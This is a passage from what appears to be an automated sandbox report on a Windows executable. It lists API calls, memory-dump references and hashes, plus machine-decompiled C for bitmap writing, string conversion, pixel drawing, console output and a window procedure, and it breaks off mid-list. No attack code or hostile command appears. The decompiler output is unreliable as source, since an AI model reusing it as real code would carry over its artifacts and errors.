                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 002FB438
                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 002FB4A6
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002FB4E9
                                              • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 002FB502
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002FB51A
                                              • ReleaseDC.USER32 ref: 002FB526
                                              • CloseHandle.KERNEL32(?), ref: 002FB530
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: File$BitsWrite$CloseCreateHandleObjectRelease
                                              • String ID: (
                                              • API String ID: 1864849596-3887548279
                                              • Opcode ID: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction ID: 99a353824dc3299d9dd34eefd8ceeed3b4ee44d0fb702dd5b19753f217b23ecc
                                              • Opcode Fuzzy Hash: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction Fuzzy Hash: B46104B5E00208EBDB04CFD4D995BEEBBB5EF88700F108119E615BB294D775AA04CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 69%
                                              			E002F71BF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                              				signed int _v8;
                                              				int _v12;
                                              				void* _v24;
                                              				signed int _t49;
                                              				signed int _t54;
                                              				int _t58;
                                              				signed int _t60;
                                              				short* _t62;
                                              				signed int _t66;
                                              				short* _t70;
                                              				int _t71;
                                              				int _t78;
                                              				short* _t81;
                                              				signed int _t87;
                                              				signed int _t90;
                                              				void* _t95;
                                              				void* _t96;
                                              				int _t98;
                                              				short* _t101;
                                              				int _t103;
                                              				signed int _t106;
                                              				short* _t107;
                                              				void* _t110;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t49 =  *0x304018; // 0x9021af28
                                              				_v8 = _t49 ^ _t106;
                                              				_push(__esi);
                                              				_t103 = _a20;
                                              				if(_t103 > 0) {
                                              					_t78 = E002F795F(_a16, _t103);
                                              					_t110 = _t78 - _t103;
                                              					_t4 = _t78 + 1; // 0x1
                                              					_t103 = _t4;
                                              					if(_t110 >= 0) {
                                              						_t103 = _t78;
                                              					}
                                              				}
                                              				_t98 = _a32;
                                              				if(_t98 == 0) {
                                              					_t98 =  *( *_a4 + 8);
                                              					_a32 = _t98;
                                              				}
                                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                              				_v12 = _t54;
                                              				if(_t54 == 0) {
                                              					L38:
                                              					return E002F19D1(_v8 ^ _t106);
                                              				} else {
                                              					_t95 = _t54 + _t54;
                                              					_t85 = _t95 + 8;
                                              					asm("sbb eax, eax");
                                              					if((_t95 + 0x00000008 & _t54) == 0) {
                                              						_t81 = 0;
                                              						__eflags = 0;
                                              						L14:
                                              						if(_t81 == 0) {
                                              							L36:
                                              							_t105 = 0;
                                              							L37:
                                              							E002F5CC8(_t81);
                                              							goto L38;
                                              						}
                                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                              						_t121 = _t58;
                                              						if(_t58 == 0) {
                                              							goto L36;
                                              						}
                                              						_t100 = _v12;
                                              						_t60 = E002F527C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                              						_t105 = _t60;
                                              						if(_t105 == 0) {
                                              							goto L36;
                                              						}
                                              						if((_a12 & 0x00000400) == 0) {
                                              							_t96 = _t105 + _t105;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							__eflags = _t87 & _t60;
                                              							if((_t87 & _t60) == 0) {
                                              								_t101 = 0;
                                              								__eflags = 0;
                                              								L30:
                                              								__eflags = _t101;
                                              								if(__eflags == 0) {
                                              									L35:
                                              									E002F5CC8(_t101);
                                              									goto L36;
                                              								}
                                              								_t62 = E002F527C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                              								__eflags = _t62;
                                              								if(_t62 == 0) {
                                              									goto L35;
                                              								}
                                              								_push(0);
                                              								_push(0);
                                              								__eflags = _a28;
                                              								if(_a28 != 0) {
                                              									_push(_a28);
                                              									_push(_a24);
                                              								} else {
                                              									_push(0);
                                              									_push(0);
                                              								}
                                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                              								__eflags = _t105;
                                              								if(_t105 != 0) {
                                              									E002F5CC8(_t101);
                                              									goto L37;
                                              								} else {
                                              									goto L35;
                                              								}
                                              							}
                                              							_t90 = _t96 + 8;
                                              							__eflags = _t96 - _t90;
                                              							asm("sbb eax, eax");
                                              							_t66 = _t60 & _t90;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t66 - 0x400;
                                              							if(_t66 > 0x400) {
                                              								__eflags = _t96 - _t87;
                                              								asm("sbb eax, eax");
                                              								_t101 = E002F3696(_t87, _t66 & _t87);
                                              								_pop(_t87);
                                              								__eflags = _t101;
                                              								if(_t101 == 0) {
                                              									goto L35;
                                              								}
                                              								 *_t101 = 0xdddd;
                                              								L28:
                                              								_t101 =  &(_t101[4]);
                                              								goto L30;
                                              							}
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							E002FA3A0();
                                              							_t101 = _t107;
                                              							__eflags = _t101;
                                              							if(_t101 == 0) {
                                              								goto L35;
                                              							}
                                              							 *_t101 = 0xcccc;
                                              							goto L28;
                                              						}
                                              						_t70 = _a28;
                                              						if(_t70 == 0) {
                                              							goto L37;
                                              						}
                                              						_t125 = _t105 - _t70;
                                              						if(_t105 > _t70) {
                                              							goto L36;
                                              						}
                                              						_t71 = E002F527C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                              						_t105 = _t71;
                                              						if(_t71 != 0) {
                                              							goto L37;
                                              						}
                                              						goto L36;
                                              					}
                                              					asm("sbb eax, eax");
                                              					_t72 = _t54 & _t95 + 0x00000008;
                                              					_t85 = _t95 + 8;
                                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                              						__eflags = _t95 - _t85;
                                              						asm("sbb eax, eax");
                                              						_t81 = E002F3696(_t85, _t72 & _t85);
                                              						_pop(_t85);
                                              						__eflags = _t81;
                                              						if(__eflags == 0) {
                                              							goto L36;
                                              						}
                                              						 *_t81 = 0xdddd;
                                              						L12:
                                              						_t81 =  &(_t81[4]);
                                              						goto L14;
                                              					}
                                              					asm("sbb eax, eax");
                                              					E002FA3A0();
                                              					_t81 = _t107;
                                              					if(_t81 == 0) {
                                              						goto L36;
                                              					}
                                              					 *_t81 = 0xcccc;
                                              					goto L12;
                                              				}
                                              			}


























                                              0x002f71c4
                                              0x002f71c5
                                              0x002f71c6
                                              0x002f71cd
                                              0x002f71d1
                                              0x002f71d2
                                              0x002f71d8
                                              0x002f71de
                                              0x002f71e4
                                              0x002f71e7
                                              0x002f71e7
                                              0x002f71ea
                                              0x002f71ec
                                              0x002f71ec
                                              0x002f71ea
                                              0x002f71ee
                                              0x002f71f3
                                              0x002f71fa
                                              0x002f71fd
                                              0x002f71fd
                                              0x002f7219
                                              0x002f721f
                                              0x002f7224
                                              0x002f73b7
                                              0x002f73ca
                                              0x002f722a
                                              0x002f722a
                                              0x002f722d
                                              0x002f7232
                                              0x002f7236
                                              0x002f728a
                                              0x002f728a
                                              0x002f728c
                                              0x002f728e
                                              0x002f73ac
                                              0x002f73ac
                                              0x002f73ae
                                              0x002f73af
                                              0x00000000
                                              0x002f73b5
                                              0x002f729f
                                              0x002f72a5
                                              0x002f72a7
                                              0x00000000
                                              0x00000000
                                              0x002f72ad
                                              0x002f72bf
                                              0x002f72c4
                                              0x002f72c8
                                              0x00000000
                                              0x00000000
                                              0x002f72d5
                                              0x002f730f
                                              0x002f7312
                                              0x002f7315
                                              0x002f7317
                                              0x002f7319
                                              0x002f731b
                                              0x002f7367
                                              0x002f7367
                                              0x002f7369
                                              0x002f7369
                                              0x002f736b
                                              0x002f73a5
                                              0x002f73a6
                                              0x00000000
                                              0x002f73ab
                                              0x002f737f
                                              0x002f7384
                                              0x002f7386
                                              0x00000000
                                              0x00000000
                                              0x002f738a
                                              0x002f738b
                                              0x002f738c
                                              0x002f738f
                                              0x002f73cb
                                              0x002f73ce
                                              0x002f7391
                                              0x002f7391
                                              0x002f7392
                                              0x002f7392
                                              0x002f739f
                                              0x002f73a1
                                              0x002f73a3
                                              0x002f73d4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f73a3
                                              0x002f731d
                                              0x002f7320
                                              0x002f7322
                                              0x002f7324
                                              0x002f7326
                                              0x002f7329
                                              0x002f732e
                                              0x002f7349
                                              0x002f734b
                                              0x002f7355
                                              0x002f7357
                                              0x002f7358
                                              0x002f735a
                                              0x00000000
                                              0x00000000
                                              0x002f735c
                                              0x002f7362
                                              0x002f7362
                                              0x00000000
                                              0x002f7362
                                              0x002f7330
                                              0x002f7332
                                              0x002f7336
                                              0x002f733b
                                              0x002f733d
                                              0x002f733f
                                              0x00000000
                                              0x00000000
                                              0x002f7341
                                              0x00000000
                                              0x002f7341
                                              0x002f72d7
                                              0x002f72dc
                                              0x00000000
                                              0x00000000
                                              0x002f72e2
                                              0x002f72e4
                                              0x00000000
                                              0x00000000
                                              0x002f72fb
                                              0x002f7300
                                              0x002f7304
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f730a
                                              0x002f723d
                                              0x002f723f
                                              0x002f7241
                                              0x002f7249
                                              0x002f7268
                                              0x002f726a
                                              0x002f7274
                                              0x002f7276
                                              0x002f7277
                                              0x002f7279
                                              0x00000000
                                              0x00000000
                                              0x002f727f
                                              0x002f7285
                                              0x002f7285
                                              0x00000000
                                              0x002f7285
                                              0x002f724d
                                              0x002f7251
                                              0x002f7256
                                              0x002f725a
                                              0x00000000
                                              0x00000000
                                              0x002f7260
                                              0x00000000
                                              0x002f7260

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,002F7410,?,?,00000000), ref: 002F7219
                                              • __alloca_probe_16.LIBCMT ref: 002F7251
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,002F7410,?,?,00000000,?,?,?), ref: 002F729F
                                              • __alloca_probe_16.LIBCMT ref: 002F7336
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002F7399
                                              • __freea.LIBCMT ref: 002F73A6
                                                • Part of subcall function 002F3696: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              • __freea.LIBCMT ref: 002F73AF
                                              • __freea.LIBCMT ref: 002F73D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: c11aaefb75d8848fc1a81ec80b12affd0d6809ef9fdfc52c38ef77af13631044
                                              • Instruction ID: 43bc0e9ba9128226248c9f989fd150a18c19126853d7f0b8dde60b7c5098216e
                                              • Opcode Fuzzy Hash: c11aaefb75d8848fc1a81ec80b12affd0d6809ef9fdfc52c38ef77af13631044
                                              • Instruction Fuzzy Hash: C851007262421FBBEB258E64CC42EBFB7AAEB44790B150279FE04D6150EB70DC609B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC0F0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t41;
                                              
                                              				_t41 = _a4;
                                              				_v8 =  *_t41;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush(_v8[1]);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc),  *_v8, 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v12);
                                              					}
                                              					SetPixel(_v12, _v20, _v16, _v8[1]);
                                              					_v8 = _v8[4];
                                              					_t41 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t41;
                                              			}










                                              0x002fc0f6
                                              0x002fc0fb
                                              0x002fc0fe
                                              0x002fc112
                                              0x002fc11b
                                              0x002fc124
                                              0x002fc12b
                                              0x002fc15b
                                              0x002fc16c
                                              0x002fc18f
                                              0x002fc19d
                                              0x00000000
                                              0x002fc1a7
                                              0x002fc146
                                              0x002fc1b5
                                              0x002fc1c0
                                              0x002fc1c0
                                              0x002fc1ce

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction ID: 4c913f30251323b740b4c7693da2ffb3dedb81674b65a05090a9138130059aa1
                                              • Opcode Fuzzy Hash: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction Fuzzy Hash: 01318479A10208EFCB04DF98D988DAEF7B5BF88350F208598E909A7361C771AE51DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC1E0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t40;
                                              
                                              				_t40 = _a4;
                                              				_v8 =  *_t40;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush( *_v8);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc), _v8[1], 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v24);
                                              					}
                                              					SetPixel(_v12, _v20, _v16,  *_v8);
                                              					_v8 = _v8[4];
                                              					_t40 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t40;
                                              			}










                                              0x002fc1e6
                                              0x002fc1eb
                                              0x002fc1ee
                                              0x002fc202
                                              0x002fc20b
                                              0x002fc214
                                              0x002fc21b
                                              0x002fc249
                                              0x002fc25a
                                              0x002fc27e
                                              0x002fc28c
                                              0x00000000
                                              0x002fc296
                                              0x002fc235
                                              0x002fc2a4
                                              0x002fc2af
                                              0x002fc2af
                                              0x002fc2bd

                                              APIs
                                              • GetDC.USER32(?), ref: 002FC1FC
                                              • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 002FC235
                                              • CreateSolidBrush.GDI32(?), ref: 002FC243
                                              • SelectObject.GDI32(?,?), ref: 002FC254
                                              • ExtFloodFill.GDI32(?,?,?,?,00000001), ref: 002FC27E
                                              • SelectObject.GDI32(?,?), ref: 002FC28C
                                              • DeleteObject.GDI32(?), ref: 002FC296
                                              • ReleaseDC.USER32 ref: 002FC2AF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction ID: 9d87577a3609e387190e3697e5d7fd5c95a8d2ed99a56f85721d654b6051f932
                                              • Opcode Fuzzy Hash: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction Fuzzy Hash: 65318279A10208EFCB08CFD4D9989AEB7B5FB88350F208599E905A7360C770AE41DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E002F7AAA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed char _v15;
                                              				char _v16;
                                              				void _v24;
                                              				short _v28;
                                              				char _v31;
                                              				void _v32;
                                              				long _v36;
                                              				intOrPtr _v40;
                                              				void* _v44;
                                              				signed int _v48;
                                              				signed char* _v52;
                                              				long _v56;
                                              				int _v60;
                                              				signed int _t78;
                                              				signed int _t80;
                                              				int _t86;
                                              				void* _t94;
                                              				long _t97;
                                              				void _t105;
                                              				void* _t112;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed char _t123;
                                              				signed char _t128;
                                              				intOrPtr _t129;
                                              				signed int _t131;
                                              				signed char* _t133;
                                              				intOrPtr* _t135;
                                              				signed int _t136;
                                              				void* _t137;
                                              
                                              				_t78 =  *0x304018; // 0x9021af28
                                              				_v8 = _t78 ^ _t136;
                                              				_t80 = _a8;
                                              				_t118 = _t80 >> 6;
                                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                                              				_t133 = _a12;
                                              				_v52 = _t133;
                                              				_v48 = _t118;
                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x3056f8 + _t118 * 4)) + _t116 + 0x18));
                                              				_v40 = _a16 + _t133;
                                              				_t86 = GetConsoleCP();
                                              				_t135 = _a4;
                                              				_v60 = _t86;
                                              				 *_t135 = 0;
                                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                                              				while(_t133 < _v40) {
                                              					_v28 = 0;
                                              					_v31 =  *_t133;
                                              					_t129 =  *((intOrPtr*)(0x3056f8 + _v48 * 4));
                                              					_t123 =  *(_t129 + _t116 + 0x2d);
                                              					if((_t123 & 0x00000004) == 0) {
                                              						if(( *(E002F58B9(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                              							_push(1);
                                              							_push(_t133);
                                              							goto L8;
                                              						} else {
                                              							if(_t133 >= _v40) {
                                              								_t131 = _v48;
                                              								 *((char*)( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                              								 *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              							} else {
                                              								_t112 = E002F6B15( &_v28, _t133, 2);
                                              								_t137 = _t137 + 0xc;
                                              								if(_t112 != 0xffffffff) {
                                              									_t133 =  &(_t133[1]);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t128 = _t123 & 0x000000fb;
                                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                              						_push(2);
                                              						_v15 = _t128;
                                              						 *(_t129 + _t116 + 0x2d) = _t128;
                                              						_push( &_v16);
                                              						L8:
                                              						_push( &_v28);
                                              						_t94 = E002F6B15();
                                              						_t137 = _t137 + 0xc;
                                              						if(_t94 != 0xffffffff) {
                                              							L9:
                                              							_t133 =  &(_t133[1]);
                                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                              							_v56 = _t97;
                                              							if(_t97 != 0) {
                                              								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                              									L19:
                                              									 *_t135 = GetLastError();
                                              								} else {
                                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                              									if(_v36 >= _v56) {
                                              										if(_v31 != 0xa) {
                                              											goto L16;
                                              										} else {
                                              											_t105 = 0xd;
                                              											_v32 = _t105;
                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                              												goto L19;
                                              											} else {
                                              												if(_v36 >= 1) {
                                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              													goto L16;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L20;
                                              					L16:
                                              				}
                                              				L20:
                                              				return E002F19D1(_v8 ^ _t136);
                                              			}


































                                              0x002f7ab2
                                              0x002f7ab9
                                              0x002f7abc
                                              0x002f7ac4
                                              0x002f7ac8
                                              0x002f7ad4
                                              0x002f7ad7
                                              0x002f7ada
                                              0x002f7ae1
                                              0x002f7ae9
                                              0x002f7aec
                                              0x002f7af2
                                              0x002f7af8
                                              0x002f7afd
                                              0x002f7aff
                                              0x002f7b02
                                              0x002f7b07
                                              0x002f7b11
                                              0x002f7b18
                                              0x002f7b1b
                                              0x002f7b22
                                              0x002f7b29
                                              0x002f7b55
                                              0x002f7b7b
                                              0x002f7b7d
                                              0x00000000
                                              0x002f7b57
                                              0x002f7b5a
                                              0x002f7c21
                                              0x002f7c2d
                                              0x002f7c38
                                              0x002f7c3d
                                              0x002f7b60
                                              0x002f7b67
                                              0x002f7b6c
                                              0x002f7b72
                                              0x002f7b78
                                              0x00000000
                                              0x002f7b78
                                              0x002f7b72
                                              0x002f7b5a
                                              0x002f7b2b
                                              0x002f7b2f
                                              0x002f7b32
                                              0x002f7b38
                                              0x002f7b3a
                                              0x002f7b3d
                                              0x002f7b41
                                              0x002f7b7e
                                              0x002f7b81
                                              0x002f7b82
                                              0x002f7b87
                                              0x002f7b8d
                                              0x002f7b93
                                              0x002f7ba2
                                              0x002f7ba8
                                              0x002f7bae
                                              0x002f7bb3
                                              0x002f7bcf
                                              0x002f7c42
                                              0x002f7c48
                                              0x002f7bd1
                                              0x002f7bd9
                                              0x002f7be2
                                              0x002f7be8
                                              0x00000000
                                              0x002f7bea
                                              0x002f7bec
                                              0x002f7bef
                                              0x002f7c08
                                              0x00000000
                                              0x002f7c0a
                                              0x002f7c0e
                                              0x002f7c10
                                              0x002f7c13
                                              0x00000000
                                              0x002f7c13
                                              0x002f7c0e
                                              0x002f7c08
                                              0x002f7be8
                                              0x002f7be2
                                              0x002f7bcf
                                              0x002f7bb3
                                              0x002f7b8d
                                              0x00000000
                                              0x002f7c16
                                              0x002f7c16
                                              0x002f7c4a
                                              0x002f7c5c

                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002F821F,?,00000000,?,00000000,00000000), ref: 002F7AEC
                                              • __fassign.LIBCMT ref: 002F7B67
                                              • __fassign.LIBCMT ref: 002F7B82
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002F7BA8
                                              • WriteFile.KERNEL32(?,?,00000000,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7BC7
                                              • WriteFile.KERNEL32(?,?,00000001,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7C00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction ID: 9889fc726157420b97cad4c1014da81693ccc0eaec0cab8c9ba46af1544bd160
                                              • Opcode Fuzzy Hash: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction Fuzzy Hash: 1A51F3B091420D9FDB10CFA8D885AFEFBF8EF09340F14407AE651E7291E6709951CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCD70(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              				struct HDC__* _v12;
                                              				struct tagRECT _v28;
                                              				struct tagPAINTSTRUCT _v92;
                                              				long _t36;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 0xf) {
                                              					GetClientRect(_a4,  &_v28);
                                              					_v12 = BeginPaint(_a4,  &_v92);
                                              					_t36 =  *0x304a00; // 0xffffff
                                              					SetBkColor(_v12, _t36);
                                              					ExtTextOutW(_v12, 0, 0, 2,  &_v28, 0x305938, 0, 0);
                                              					EndPaint(_a4,  &_v92);
                                              				} else {
                                              					if(_v8 == 0x201) {
                                              						 *0x304a00 = E002FCA50(_a4);
                                              						InvalidateRect(_a4, 0, 1);
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}








                                              0x002fcd79
                                              0x002fcd80
                                              0x002fcdb3
                                              0x002fcdc7
                                              0x002fcdca
                                              0x002fcdd5
                                              0x002fcdf2
                                              0x002fce00
                                              0x002fcd82
                                              0x002fcd89
                                              0x002fcd96
                                              0x002fcda3
                                              0x002fcda3
                                              0x002fcd89
                                              0x002fce1f

                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 002FCDA3
                                              • GetClientRect.USER32 ref: 002FCDB3
                                              • BeginPaint.USER32(?,?), ref: 002FCDC1
                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 002FCDD5
                                              • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00305938,00000000,00000000), ref: 002FCDF2
                                              • EndPaint.USER32(?,?), ref: 002FCE00
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 002FCE16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
